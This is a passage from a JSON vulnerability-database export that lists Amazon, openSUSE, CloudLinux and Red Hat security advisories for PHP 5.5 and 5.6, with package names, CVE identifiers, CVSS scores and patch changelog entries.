\n php55-fpm-5.5.35-1.114.amzn1.i686 \n php55-opcache-5.5.35-1.114.amzn1.i686 \n php55-imap-5.5.35-1.114.amzn1.i686 \n php55-mysqlnd-5.5.35-1.114.amzn1.i686 \n php55-odbc-5.5.35-1.114.amzn1.i686 \n php55-process-5.5.35-1.114.amzn1.i686 \n php55-soap-5.5.35-1.114.amzn1.i686 \n php55-ldap-5.5.35-1.114.amzn1.i686 \n php56-cli-5.6.21-1.124.amzn1.i686 \n php56-embedded-5.6.21-1.124.amzn1.i686 \n php56-ldap-5.6.21-1.124.amzn1.i686 \n php56-common-5.6.21-1.124.amzn1.i686 \n php56-intl-5.6.21-1.124.amzn1.i686 \n php56-mcrypt-5.6.21-1.124.amzn1.i686 \n php56-mysqlnd-5.6.21-1.124.amzn1.i686 \n php56-xml-5.6.21-1.124.amzn1.i686 \n php56-debuginfo-5.6.21-1.124.amzn1.i686 \n php56-pgsql-5.6.21-1.124.amzn1.i686 \n php56-fpm-5.6.21-1.124.amzn1.i686 \n php56-bcmath-5.6.21-1.124.amzn1.i686 \n php56-xmlrpc-5.6.21-1.124.amzn1.i686 \n php56-dba-5.6.21-1.124.amzn1.i686 \n php56-devel-5.6.21-1.124.amzn1.i686 \n php56-pdo-5.6.21-1.124.amzn1.i686 \n php56-snmp-5.6.21-1.124.amzn1.i686 \n php56-opcache-5.6.21-1.124.amzn1.i686 \n php56-mssql-5.6.21-1.124.amzn1.i686 \n php56-recode-5.6.21-1.124.amzn1.i686 \n php56-odbc-5.6.21-1.124.amzn1.i686 \n php56-gmp-5.6.21-1.124.amzn1.i686 \n php56-gd-5.6.21-1.124.amzn1.i686 \n php56-pspell-5.6.21-1.124.amzn1.i686 \n php56-5.6.21-1.124.amzn1.i686 \n php56-soap-5.6.21-1.124.amzn1.i686 \n php56-mbstring-5.6.21-1.124.amzn1.i686 \n php56-process-5.6.21-1.124.amzn1.i686 \n php56-tidy-5.6.21-1.124.amzn1.i686 \n php56-imap-5.6.21-1.124.amzn1.i686 \n php56-dbg-5.6.21-1.124.amzn1.i686 \n php56-enchant-5.6.21-1.124.amzn1.i686 \n \n src: \n php55-5.5.35-1.114.amzn1.src \n php56-5.6.21-1.124.amzn1.src \n \n x86_64: \n php55-devel-5.5.35-1.114.amzn1.x86_64 \n php55-gd-5.5.35-1.114.amzn1.x86_64 \n php55-enchant-5.5.35-1.114.amzn1.x86_64 \n php55-mysqlnd-5.5.35-1.114.amzn1.x86_64 \n php55-intl-5.5.35-1.114.amzn1.x86_64 \n php55-imap-5.5.35-1.114.amzn1.x86_64 \n php55-pgsql-5.5.35-1.114.amzn1.x86_64 \n php55-5.5.35-1.114.amzn1.x86_64 \n php55-bcmath-5.5.35-1.114.amzn1.x86_64 \n php55-dba-5.5.35-1.114.amzn1.x86_64 \n php55-mssql-5.5.35-1.114.amzn1.x86_64 \n php55-process-5.5.35-1.114.amzn1.x86_64 \n php55-xml-5.5.35-1.114.amzn1.x86_64 \n php55-pspell-5.5.35-1.114.amzn1.x86_64 \n php55-recode-5.5.35-1.114.amzn1.x86_64 \n php55-pdo-5.5.35-1.114.amzn1.x86_64 \n php55-xmlrpc-5.5.35-1.114.amzn1.x86_64 \n php55-snmp-5.5.35-1.114.amzn1.x86_64 \n php55-fpm-5.5.35-1.114.amzn1.x86_64 \n php55-ldap-5.5.35-1.114.amzn1.x86_64 \n php55-gmp-5.5.35-1.114.amzn1.x86_64 \n php55-embedded-5.5.35-1.114.amzn1.x86_64 \n php55-mcrypt-5.5.35-1.114.amzn1.x86_64 \n php55-odbc-5.5.35-1.114.amzn1.x86_64 \n php55-common-5.5.35-1.114.amzn1.x86_64 \n php55-tidy-5.5.35-1.114.amzn1.x86_64 \n php55-mbstring-5.5.35-1.114.amzn1.x86_64 \n php55-cli-5.5.35-1.114.amzn1.x86_64 \n php55-opcache-5.5.35-1.114.amzn1.x86_64 \n php55-debuginfo-5.5.35-1.114.amzn1.x86_64 \n php55-soap-5.5.35-1.114.amzn1.x86_64 \n php56-opcache-5.6.21-1.124.amzn1.x86_64 \n php56-5.6.21-1.124.amzn1.x86_64 \n php56-debuginfo-5.6.21-1.124.amzn1.x86_64 \n php56-mcrypt-5.6.21-1.124.amzn1.x86_64 \n php56-fpm-5.6.21-1.124.amzn1.x86_64 \n php56-bcmath-5.6.21-1.124.amzn1.x86_64 \n php56-ldap-5.6.21-1.124.amzn1.x86_64 \n php56-xmlrpc-5.6.21-1.124.amzn1.x86_64 \n php56-intl-5.6.21-1.124.amzn1.x86_64 \n php56-dba-5.6.21-1.124.amzn1.x86_64 \n php56-embedded-5.6.21-1.124.amzn1.x86_64 \n php56-common-5.6.21-1.124.amzn1.x86_64 \n php56-mysqlnd-5.6.21-1.124.amzn1.x86_64 \n php56-tidy-5.6.21-1.124.amzn1.x86_64 \n php56-gmp-5.6.21-1.124.amzn1.x86_64 \n php56-recode-5.6.21-1.124.amzn1.x86_64 \n php56-enchant-5.6.21-1.124.amzn1.x86_64 \n php56-process-5.6.21-1.124.amzn1.x86_64 \n php56-xml-5.6.21-1.124.amzn1.x86_64 \n php56-devel-5.6.21-1.124.amzn1.x86_64 \n php56-gd-5.6.21-1.124.amzn1.x86_64 \n php56-cli-5.6.21-1.124.amzn1.x86_64 \n php56-soap-5.6.21-1.124.amzn1.x86_64 \n php56-odbc-5.6.21-1.124.amzn1.x86_64 \n php56-snmp-5.6.21-1.124.amzn1.x86_64 \n php56-mssql-5.6.21-1.124.amzn1.x86_64 \n php56-imap-5.6.21-1.124.amzn1.x86_64 \n php56-pspell-5.6.21-1.124.amzn1.x86_64 \n php56-mbstring-5.6.21-1.124.amzn1.x86_64 \n php56-pdo-5.6.21-1.124.amzn1.x86_64 \n php56-pgsql-5.6.21-1.124.amzn1.x86_64 \n php56-dbg-5.6.21-1.124.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2016-05-03T10:30:00", "published": "2016-05-03T10:30:00", "id": "ALAS-2016-698", "href": "https://alas.aws.amazon.com/ALAS-2016-698.html", "title": "Important: php56, php55", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:18:18", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8867", "CVE-2016-4070", "CVE-2016-3074", "CVE-2016-4073", "CVE-2015-8866", "CVE-2016-4071"], "description": "This update for php5 fixes the following issues:\n\n - CVE-2016-4073: A remote attacker could have caused denial of service, or\n possibly execute arbitrary code, due to incorrect handling of string\n length calculations in mb_strcut() (bsc#977003)\n - CVE-2016-3074: Signedness vulnerability in bundled libgd may have\n resulted in a heap overflow when processing compressed gd2 data.\n (boo#976775)\n - CVE-2015-8867: The PHP function openssl_random_pseudo_bytes() did not\n return cryptographically secure random bytes (bsc#977005)\n - CVE-2016-4070: The libxml_disable_entity_loader() setting was shared\n between threads, which could have resulted in XML external entity\n injection and entity expansion issues (bsc#976997)\n - CVE-2015-8866: A remote attacker could have caused denial of service due\n to incorrect handling of large strings in php_raw_url_encode()\n (bsc#976996)\n - CVE-2016-4071: A remote attacker could have caused denial of service, or\n possibly execute arbitrary code, due to incorrect handling of string\n formatting in php_snmp_error() (bsc#977000)\n\n", "edition": 1, "modified": "2016-05-11T14:07:47", "published": "2016-05-11T14:07:47", "id": "OPENSUSE-SU-2016:1274-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00031.html", "type": "suse", "title": "Security update for php5 (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:30:16", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8873", "CVE-2015-8879", "CVE-2013-7456", "CVE-2015-8877", "CVE-2015-8874", "CVE-2015-4116", "CVE-2016-5093", "CVE-2016-3074", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-5096", "CVE-2016-5114", "CVE-2015-8876"], "description": "This update for php5 fixes the following issues:\n\n - CVE-2013-7456: imagescale out-of-bounds read (bnc#982009).\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read (bnc#982010).\n - CVE-2016-5094: Don't create strings with lengths outside int range\n (bnc#982011).\n - CVE-2016-5095: Don't create strings with lengths outside int range\n (bnc#982012).\n - CVE-2016-5096: int/size_t confusion in fread (bsc#982013).\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow (bnc#982162).\n - CVE-2015-8877: The gdImageScaleTwoPass function in gd_interpolation.c in\n the GD Graphics Library (aka libgd), as used in PHP, used inconsistent\n allocate and free approaches, which allowed remote attackers to cause a\n denial of service (memory consumption) via a crafted call, as\n demonstrated by a call to the PHP imagescale function (bsc#981061).\n - CVE-2015-8876: Zend/zend_exceptions.c in PHP did not validate certain\n Exception objects, which allowed remote attackers to cause a denial of\n service (NULL pointer dereference and application crash) or trigger\n unintended method execution via crafted serialized data (bsc#981049).\n - CVE-2015-8879: The odbc_bindcols function in ext/odbc/php_odbc.c in PHP\n mishandled driver behavior for SQL_WVARCHAR columns, which allowed\n remote attackers to cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the odbc_fetch_array\n function to access a certain type of Microsoft SQL Server table Aliased:\n (bsc#981050).\n - CVE-2015-4116: Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP allowed remote attackers to\n execute arbitrary code by triggering a failed SplMinHeap::compare\n operation (bsc#980366).\n - CVE-2015-8874: Stack consumption vulnerability in GD in PHP allowed\n remote attackers to cause a denial of service via a crafted\n imagefilltoborder call (bsc#980375).\n - CVE-2015-8873: Stack consumption vulnerability in Zend/zend_exceptions.c\n in PHP allowed remote attackers to cause a denial of service\n (segmentation fault) via recursive method calls (bsc#980373).\n - CVE-2016-3074: Integer signedness error in GD Graphics Library (aka\n libgd or libgd2) allowed remote attackers to cause a denial of service\n (crash) or potentially execute arbitrary code via crafted compressed gd2\n data, which triggers a heap-based buffer overflow (bsc#976775).\n\n", "edition": 1, "modified": "2016-06-11T14:14:42", "published": "2016-06-11T14:14:42", "id": "OPENSUSE-SU-2016:1553-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00015.html", "title": "Security update for php5 (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cloudlinux": [{"lastseen": "2020-11-25T15:43:32", "bulletinFamily": "unix", "cvelist": ["CVE-2006-7243", "CVE-2011-4718", "CVE-2014-9653", "CVE-2014-9767", "CVE-2015-0235", "CVE-2015-2331", "CVE-2015-2348", "CVE-2015-3152", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4598", "CVE-2015-5590", "CVE-2015-6831", "CVE-2015-6833", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7804", "CVE-2015-8835", "CVE-2015-8867", "CVE-2015-8876", "CVE-2015-8879", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2554", "CVE-2016-3074", "CVE-2016-4073", "CVE-2016-4343", "CVE-2016-4537", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5096", "CVE-2016-5399", "CVE-2016-5766", "CVE-2016-5772", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6294", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7128", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7478", "CVE-2016-8670", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2018-5712", "CVE-2019-11048", "CVE-2019-13224", "CVE-2019-9023", "CVE-2020-7067", "CVE-2020-7070"], "description": "- Fix bug #69720: Null pointer dereference in phar_get_fp_offset()\n- Fix bug #70728: Type Confusion Vulnerability in PHP_to_XMLRPC_worker()\n- Fix bug #70661: Use After Free Vulnerability in WDDX Packet Deserialization\n- Fix bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability\n- Fix bug #71459: Integer overflow in iptcembed()\n- Fix bug #71039: exec functions ignore length but look for NULL termination\n- Fix bug #71354: Heap corruption in tar/zip/phar parser.\n- Fix bug #71391: NULL Pointer Dereference in phar_tar_setupmetadata()\n- Fix bug #71323: Output of stream_get_meta_data can be falsified by its input\n- Fix bug #71498: Out-of-Bound Read in phar_parse_zipfile()\n- Fix bug #71587: Use-After-Free / Double-Free in WDDX Deserialize\n- Fix bug #71860: Invalid memory write in phar on filename with \\0 in name\n- Fix bug #71798: Integer Overflow in php_raw_url_encode\n- Fix bug #72837: integer overflow in bzdecompress caused heap corruption\n- Fix bug #72681: PHP Session Data Injection Vulnerability\n- Fix bug #72807: integer overflow in curl_escape caused heap corruption\n- Fix bug #72838: Integer overflow lead to heap corruption in sql_regcase\n- Fix bug #72697: select_colors write out-of-bounds\n- Fix bug #72730: imagegammacorrect allows arbitrary write access\n- Fix bug #72836: integer overflow in base64_decode caused heap corruption\n- Fix bug #72848: integer overflow in quoted_printable_encode caused heap corruption\n- Fix bug #72849: integer overflow in urlencode caused heap corruption\n- Fix bug #72850: integer overflow in php_uuencode caused heap corruption\n- Fix bug #72771: ftps:// wrapper is vulnerable to protocol downgrade attack\n- Fix bug #72749: wddx_deserialize allows illegal memory access\n- Fix bug #72750: wddx_deserialize null dereference\n- Fix bug #72790: wddx_deserialize null dereference with invalid xml\n- Fix bug #72799: wddx_deserialize null dereference in php_wddx_pop_element\n- Fix bug #73189: Memcpy negative size parameter php_resolve_path\n- Fix bug #73150: missing NULL check in dom_document_save_html\n- Fix bug #73284: heap overflow in php_ereg_replace function\n- Fix bug #73218: stack-buffer-overflow through "ResourceBundle" methods\n- Fix bug #73208: integer overflow in imap_8bit caused heap corruption\n- Fix bug #73082: string length overflow in mb_encode_* function\n- Fix bug #73174: heap overflow in php_pcre_replace_impl\n- Fix bug #73276: crash in openssl_random_pseudo_bytes function\n- Fix bug #73275: crash in openssl_encrypt function\n- Fix bug #73017: memory corruption in wordwrap function\n- Fix bug #73240: Write out of bounds at number_format\n- Fix bug #73073: CachingIterator null dereference when convert to string\n- Fix bug #73293: NULL pointer dereference in SimpleXMLElement::asXML()\n- Fix bug #73356: crash in bzcompress function\n- Fix bug #72696: imagefilltoborder stackoverflow on truecolor images\n- Fix bug #73418: Integer Overflow in "_php_imap_mail" leads Heap Overflow\n- Fix bug #73144: Use-after-free in ArrayObject Deserialization\n- Fix bug #73192: parse_url return wrong hostname\n- Fix bug #73331: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow\n- Fix bug #73452: Segfault (Regression for #69152)\n- Fix bug #73631: Invalid read when wddx decodes empty boolean element\n- Fix bug #67587: Redirection loop on nginx with FPM\n- Fix bug #71465: PHAR doesn't know about litespeed\n- Fix bug #73737: FPE when parsing a tag format\n- Fix bug #73868: Fix DOS vulnerability in gdImageCreateFromGd2Ctx()\n- Fix bug #73869: Signed Integer Overflow gd_io.c\n- Fix bug #73773: Seg fault when loading hostile phar\n- Fix bug #70436: Use After Free Vulnerability in unserialize()\n- Fix bug #74603: PHP INI Parsing Stack Buffer Overflow Vulnerability\n- Fix bug #72535: arcfour encryption stream filter crashes php\n- Fix bug #72434: ZipArchive class Use After Free Vulnerability in PHP's\n GC algorithm and unseria\n- Fix bug #72455: Heap Overflow due to integer overflows\n- Fix bug #74782: Reflected XSS in .phar 404 page\n- Fix bug #71335: Type Confusion in WDDX Packet Deserialization\n- Fix bug #76130: Heap Buffer Overflow (READ: 1786) in exif_iif_add_value\n- Fix bug #76249: stream filter convert.iconv leads to infinite loop on\n invalid sequence\n- Fix bug #76248: Malicious LDAP-Server Response causes Crash\n- Fix bug #76129: fix for CVE-2018-5712 may not be complete\n- Fix bug #75981: stack-buffer-overflow while parsing HTTP response\n- Fix bug #74385: Locale::parseLocale() broken with some arguments\n- Fix bug #76335: "link(): Bad file descriptor" with non-ASCII path\n- Fix bug #76383: array_map on $GLOBALS returns IS_INDIRECT\n- Fix bug #73342: Vulnerability in php-fpm by changing stdin to non-blocking\n- Fix bug #76505: array_merge_recursive() is duplicating sub-array keys\n- Fix bug #76532: Integer overflow and excessive memory usage in mb_strimwidth\n- Fix bug #76548: pg_fetch_result did not fetch the next row\n- Fix bug #76488: Memory leak when fetching a BLOB field\n- Fix bug #76665: SQLite3Stmt::bindValue() with SQLITE3_FLOAT doesn't juggle\n- Fix bug #75402: Possible Memory Leak using PDO::CURSOR_SCROLL option\n- Fix bug #76517: --with-gettext= causes configure to misjudges there is no getcwd\n- Fix bug #72443: Installing shared extensions: cp: cannot stat 'modules/*':\n No such file or dire\n- Fix bug #68175: RegexIterator pregFlags are NULL instead of 0\n- Fix bug #55146: iconv_mime_decode_headers() skips some headers\n- Fix bug #63839: iconv_mime_decode_headers function is skipping headers\n- Fix bug #60494: iconv_mime_decode does ignore special characters\n- Fix bug #68180: iconv_mime_decode can return extra characters in a header\n- Fix bug #73457: Wrong error message when fopen FTP wrapped fails to open\n data connection\n- Fix bug #74454: Wrong exception being thrown when using ReflectionMethod\n- Fix bug #74764: Bindto IPv6 works with file_get_contents but fails with\n stream_socket_client\n- Fix bug #75273: php_zlib_inflate_filter() may not update bytes_consumed\n- Fix bug #75696: posix_getgrnam fails to print details of group\n- Fix bug #76480: Use curl_multi_wait() so that timeouts are respected\n- Fix bug #76800: foreach inconsistent if array modified during loop\n- Fix bug #76886: Can't build xmlrpc with expat\n- Fix bug #76901: method_exists on SPL iterator passthrough method corrupts memory\n- Fix bug #77242: heap out of bounds read in xmlrpc_decode()\n- Fix bug #77247: heap buffer overflow in phar_detect_phar_fname_ext\n- Fix bug #77270: imagecolormatch Out Of Bounds Write on Heap\n- Fix bug #77370: Buffer overflow on mb regex functions - fetch_token\n- Fix bug #77380: Global out of bounds read in xmlrpc base64 code\n- Fix bug #77630: rename() across the device may allow unwanted access\n during processing\n- Fix bug #77494: Disabling class causes segfault on member access\n- Fix bug #77431: openFile() silently truncates after a null byte\n- Fix bug #51068: DirectoryIterator glob:// don't support current path\n relative queries\n- Fix bug #77396: Null Pointer Dereference in phar_create_or_parse_filename\n- Fix bug #77540: Invalid Read on exif_process_SOFn\n- Fix bug #77390: feof might hang on TLS streams in case of fragmented TLS records\n- Fix bug #77586: phar_tar_writeheaders_int() buffer overflow\n- Fix bug #77546: iptcembed broken function\n- Fix bug #77563: Uninitialized read in exif_process_IFD_in_MAKERNOTE\n- Fix bug #76557: heap-buffer-overflow (READ of size 48) while reading exif data\n- Fix bug #77024: SplFileObject::__toString() may return array\n- Fix bug #77945: Segmentation fault when constructing SoapClient with WSDL_CACHE_BOTH\n- Fix bug #77697: Crash on Big_Endian platform\n- Fix bug #77943: imageantialias($image, false); does not work\n- Fix bug #77944: Wrong meta pdo_type for bigint on LLP64\n- Fix bug #76717: var_export() does not create a parsable value for PHP_INT_MIN\n- Fix bug #77921: static.php.net doesn't work anymore\n- Fix bug #77934: php-fpm kill -USR2 not working\n- Fix bug #77700: Writing truecolor images as GIF ignores interlace flag\n- Fix bug #77765: FTP stream wrapper should set the directory as executable\n- Fix bug #50020: DateInterval:createDateFromString() silently fails\n- Fix bug #77742: bcpow() implementation related to gcc compiler optimization\n- Fix bug #77967: Bypassing open_basedir restrictions via file uris\n- Fix bug #77973: Uninitialized read in gdImageCreateFromXbm\n- Fix bug #77988: heap-buffer-overflow on php_jpg_get16\n- Fix bug #78192: SegFault when reuse statement after schema has changed\n- Fix bug #77124: FTP with SSL memory leak\n- Fix bug #78256: heap-buffer-overflow on exif_process_user_comment\n- Fix bug #78222: heap-buffer-overflow on exif_scan_thumbnail\n- Fix bug #77946: Bad cURL resources returned by curl_multi_info_read()\n- Fix bug #78333: Exif crash (bus error) due to wrong alignment and invalid cast\n- Fix bug #69100: Bus error from stream_copy_to_stream (file -> SSL stream)\n with invalid length\n- Fix bug #76342: file_get_contents waits twice specified timeout\n- Fix bug #76859: stream_get_line skips data if used with data-generating filter\n- Fix bug #78579: mb_decode_numericentity: args number inconsistency\n- Fix bug #78910: Heap-buffer-overflow READ in exif\n- Fix bug #78878: Buffer underflow in bc_shift_addsub\n- Fix bug #78793: Use-after-free in exif parsing under memory sanitizer\n- Fix bug #78863: DirectoryIterator class silently truncates after a null byte\n- Fix bug #79099: OOB read in php_strip_tags_ex\n- Fix bug #79082: Files added to tar with Phar::buildFromIterator have\n all-access permissions\n- Fix bug #79329: get_headers() silently truncates after a null byte\n- Fix bug #79282: Use-of-uninitialized-value in exif\n- Fix bug #61597: SimpleXMLElement doesn't include both @attributes and\n textContent in properties\n- Fix bug #74940: DateTimeZone loose comparison always true until properties\n are initialized.\n- Fix bug #79296: ZipArchive::open fails on empty file (libzip 1.6.0)\n- Fix bug #79330: shell_exec() silently truncates after a null byte\n- Fix bug #79364: When copy empty array, next key is unspecified.\n- Fix bug #79396: DateTime hour incorrect during DST jump forward using setTime\n- Fix bug #79410: system() swallows last chunk if it is exactly 4095 bytes\n without newline\n- Fix bug #79424: php_zip_glob uses gl_pathc after call to globfree\n- Fix bug #79465: OOB Read in urldecode() (CVE-2020-7067)\n- Fix bug #78221: DOMNode::normalize() doesn't remove empty text nodes\n- Fix bug #78875: Long filenames cause OOM and temp files are not cleaned\n (CVE-2019-11048)\n- Fix bug #78876: Long variables in multipart/form-data cause OOM and temp\n files are not cleaned (CVE-2019-11048)\n- Fix bug #79514: Memory leaks while including unexistent file\n- Fix bug #79528: Different object of the same xml between 7.4.5 and 7.4.4\n- Fix bug #62890: default_socket_timeout=-1 causes connection to timeout\n- Fix bug #70362: Can't copy() large 'data://' with open_basedir\n- Fix bug #73527: Invalid memory access in php_filter_strip\n- Fix bug #74267: segfault with streams and invalid data\n- Fix bug #79787: mb_strimwidth does not trim string\n- Fix bug #79877: getimagesize function silently truncates after a null byte\n- Fix bug #68447: grapheme_extract take an extra trailing character\n- Fix bug #68825: Inconsistent exception in DirectoryIterator::getLinkTarget()\n- Fix bug #74145: wddx parsing empty boolean tag leads to SIGSEGV (CVE-2017-11143)\n- Fix bug #74651: negative-size-param (-1) in memcpy in zif_openssl_seal()\n (CVE-2017-11144)\n- Fix bug #74435: Buffer over-read into uninitialized memory (CVE-2017-7890)\n- Fix bug #73093: Unserialize Exception object can lead to infinite loop\n (CVE-2016-7478)\n- Fix bug #72520: Stack-based buffer overflow vulnerability in php_stream_zip_opener\n (CVE-2016-6297)\n- Fix bug #73825: Heap out of bounds read on unserialize in finish_nested_data()\n (CVE-2016-10161)\n- Fix bug #60491: Session module is adoptive (CVE-2011-4718)\n- Fix bug #69253: ZIP Integer Overflow leads to writing past heap boundary\n (CVE-2015-2331)\n- Fix bug #69418: CVE-2006-7243 fix regressions in 5.4+ (CVE-2015-4025)\n- Fix bug #68598: pcntl_exec() should not allow null char (CVE-2015-4026)\n- Fix bug #69207: move_uploaded_file allows nulls in path (CVE-2015-2348)\n- Fix bug #69218: potential remote code execution with apache 2.4 apache2handler\n (CVE-2015-3330)\n- Fix bug #69719: Incorrect handling of paths with NULs, related to bug 69353\n (CVE-2015-4598)\n- Fix bug #69353: Missing null byte checks for paths in various PHP extensions\n (CVE-2015-3411)\n- Fix bugs #70168, #70169, #70166, #70155: Use After Free Vulnerability in\n unserialize() with\n SplObjectStorage, SplDoublyLinkedList, SPLArrayObject, SPLArrayObject (CVE-2015-6831)\n- Fix bug #70019: Files extracted from archive may be placed outside of\n destination directory (CVE-2015-6833)\n- Fix bug #70388: SOAP serialize_function_call() type confusion / RCE (CVE-2015-6836)\n- Fix bug #69782: NULL pointer dereference (CVE-2015-6837, CVE-2015-6838)\n- Fix bug #70433: Uninitialized pointer in phar_make_dirstream when zip entry\n filename is \"/\" (CVE-2015-7804)\n- Fix bug #69923: Buffer overflow and stack smashing error in phar_fix_filepath\n (CVE-2015-5590)\n- Fix bug #71488: Stack overflow when decompressing tar archives (CVE-2016-2554)\n- Fix bug #72061: Out-of-bounds reads in zif_grapheme_stripos with negative offset\n (CVE-2016-4541, CVE-2016-4540)\n- Fix bug #72094: Out of bounds heap read access in exif header processing\n (CVE-2016-4542)\n- Fix bug #72093: bcpowmod accepts negative scale and corrupts _one_ definition\n (CVE-2016-4537)\n- Fix bug #71331: Uninitialized pointer in phar_make_dirstream() (CVE-2016-4343)\n- Fix bug #72241: get_icu_value_internal out-of-bounds read (CVE-2016-5093)\n- Fix bug #72135: Integer Overflow in php_html_entities() (CVE-2016-5094)\n- Fix bug #72114: Integer underflow / arbitrary null write in fread/gzread\n (CVE-2016-5096)\n- Fix bug #72339: Integer Overflow in _gd2GetHeader() resulting in heap overflow\n (CVE-2016-5766)\n- Fix bug #72340: Double Free Courruption in wddx_deserialize (CVE-2016-5772)\n- Fix bug #72613: Inadequate error handling in bzread() (CVE-2016-5399)\n- Fix bug #70480: php_url_parse_ex() buffer overflow read (CVE-2016-6288)\n- Fix bug #72513: Stack-based buffer overflow vulnerability in virtual_file_ex\n (CVE-2016-6289)\n- Fix bug #72562: Use After Free in unserialize() with Unexpected Session\n Deserialization (CVE-2016-6290)\n- Fix bug #72603: Out of bound read in exif_process_IFD_in_MAKERNOTE (CVE-2016-6291)\n- Fix bug #72533: locale_accept_from_http out-of-bounds access (CVE-2016-6294)\n- Fix bug #69975: PHP segfaults when accessing nvarchar(max) defined columns\n (CVE-2015-8879)\n- Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c\n (CVE-2016-6296)\n- Fix bug #72293: Heap overflow in mysqlnd related to BIT fields (CVE-2016-7412)\n- Fix bug #72860: wddx_deserialize use-after-free (CVE-2016-7413)\n- Fix bug #72928: Out of bound when verify signature of zip phar in phar_parse_zipfile\n (CVE-2016-7414)\n- Fix bug #73007: SEH buffer overflow msgfmt_format_message (CVE-2016-7416)\n- Fix bug #73029: Missing type check when unserializing SplArray (CVE-2016-7417)\n- Fix bug #73065: Out-Of-Bounds Read in php_wddx_push_element of wddx.c (CVE-2016-7418)\n- Fix bug #73280: Stack Buffer Overflow in GD dynamicGetbuf (CVE-2016-8670)\n- Fix bug #73764: Crash while loading hostile phar archive (CVE-2016-10159)\n- Fix bug #73768: Memory corruption when loading hostile phar (CVE-2016-10160)\n- Fix bug #72627: Memory Leakage In exif_process_IFD_in_TIFF (CVE-2016-7128)\n- Fix bug #70350: ZipArchive::extractTo allows for directory traversal when\n creating directories (CVE-2014-9767)\n- Fix bug #70081: SoapClient info leak / null pointer dereference via multiple\n type confusions (CVE-2015-8835)\n- Fix bug #70121: unserialize() could lead to unexpected methods execution / NULL\n pointer deref (CVE-2015-8876)\n- Fix bug #71906: AddressSanitizer: negative-size-param (-1) in mbfl_strcut\n (CVE-2016-4073)\n- Fix bug #70014: openssl_random_pseudo_bytes() is not cryptographically secure\n (CVE-2015-8867)\n- Fix bug #77371: heap buffer overflow in mb regex functions - compile_string_node\n (CVE-2019-9023)\n- Fix bug #77381: heap buffer overflow in multibyte match_at (CVE-2019-9023)\n- Fix bug #77382: heap buffer overflow due to incorrect length in expand_case_fold_string\n (CVE-2019-9023)\n- Fix bug #77385: buffer overflow in fetch_token (CVE-2019-9023)\n- Fix bug #77394: Buffer overflow in multibyte case folding - unicode (CVE-2019-9023)\n- Fix vulnerabilities with oniguruma: CVE-2017-9226, CVE-2017-9224, CVE-2017-9227,\n CVE-2017-9228, CVE-2019-13224\n- Fix general vulneravilities: CVE-2014-9653, CVE-2015-0235, CVE-2015-3152,\n CVE-2016-3074\n- Fix bug #79699: PHP parses encoded cookie names so malicious `__Host-` cookies\n can be sent (CVE-2020-7070)\n- Fix bug #80007: Potential type confusion in unixtojd() parameter parsing", "modified": "2020-10-15T12:00:00", "published": "2020-10-15T12:00:00", "id": "CLSA-2020:1605798462", "href": "https://repo.cloudlinux.com/centos6-els/updateinfo.xml", "type": "cloudlinux", "title": "Fix of 227 CVE", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-12-11T13:32:46", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7456", "CVE-2014-9767", "CVE-2015-2325", "CVE-2015-2326", "CVE-2015-2327", "CVE-2015-2328", "CVE-2015-3210", "CVE-2015-3217", "CVE-2015-5073", "CVE-2015-8381", "CVE-2015-8383", "CVE-2015-8384", "CVE-2015-8385", "CVE-2015-8386", "CVE-2015-8388", "CVE-2015-8391", "CVE-2015-8392", "CVE-2015-8395", "CVE-2015-8835", "CVE-2015-8865", "CVE-2015-8866", "CVE-2015-8867", "CVE-2015-8873", "CVE-2015-8874", "CVE-2015-8876", "CVE-2015-8877", "CVE-2015-8879", "CVE-2015-8935", "CVE-2016-1903", "CVE-2016-2554", "CVE-2016-3074", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-4070", "CVE-2016-4071", "CVE-2016-4072", "CVE-2016-4073", "CVE-2016-4342", "CVE-2016-4343", "CVE-2016-4473", "CVE-2016-4537", "CVE-2016-4538", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-4544", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5096", "CVE-2016-5114", "CVE-2016-5399", "CVE-2016-5766", "CVE-2016-5767", "CVE-2016-5768", "CVE-2016-5770", "CVE-2016-5771", "CVE-2016-5772", "CVE-2016-5773", "CVE-2016-6128", "CVE-2016-6207", "CVE-2016-6288", 